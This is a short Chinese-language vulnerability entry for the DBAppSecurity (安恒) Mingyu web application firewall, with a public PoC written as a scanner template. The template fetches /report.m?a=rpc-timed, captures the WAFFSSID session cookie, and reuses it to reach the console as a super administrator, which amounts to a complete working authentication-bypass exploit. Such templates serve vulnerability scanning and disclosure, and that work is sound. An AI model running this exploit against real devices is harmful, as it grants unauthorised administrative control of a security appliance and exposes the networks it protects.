漏洞描述
安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
dbappsecurity-mingyu-report-user-bypass: 明御 WEB 应用防火墙 bypass
PoC代码[已公开]
id: dbappsecurity-mingyu-report-user-bypass
info:
name: 明御 WEB 应用防火墙 bypass
author: 123456
severity: high
description: |
安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
reference:
- http://wiki.peiqi.tech/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1WEB%E5%BA%94%E7%94%A8%E9%98%B2%E7%81%AB%E5%A2%99%20report.php%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: GET
path: /report.m?a=rpc-timed
expression: response.status == 200 && response.body.bcontains(b'error_0x110005')
output:
search: '"Set-Cookie: WAFFSSID=(?P<waffssid>.*?);".bsubmatch(response.raw_header)'
waffssid: search["waffssid"]
r1:
request:
method: GET
path: /
headers:
Cookie: "WAFFSSID={{waffssid}}"
expression: response.status == 200 && response.body.bcontains(b'console') && response.body.bcontains(b'退出') && response.body.bcontains(b'超级管理员')
expression: r0() && r1()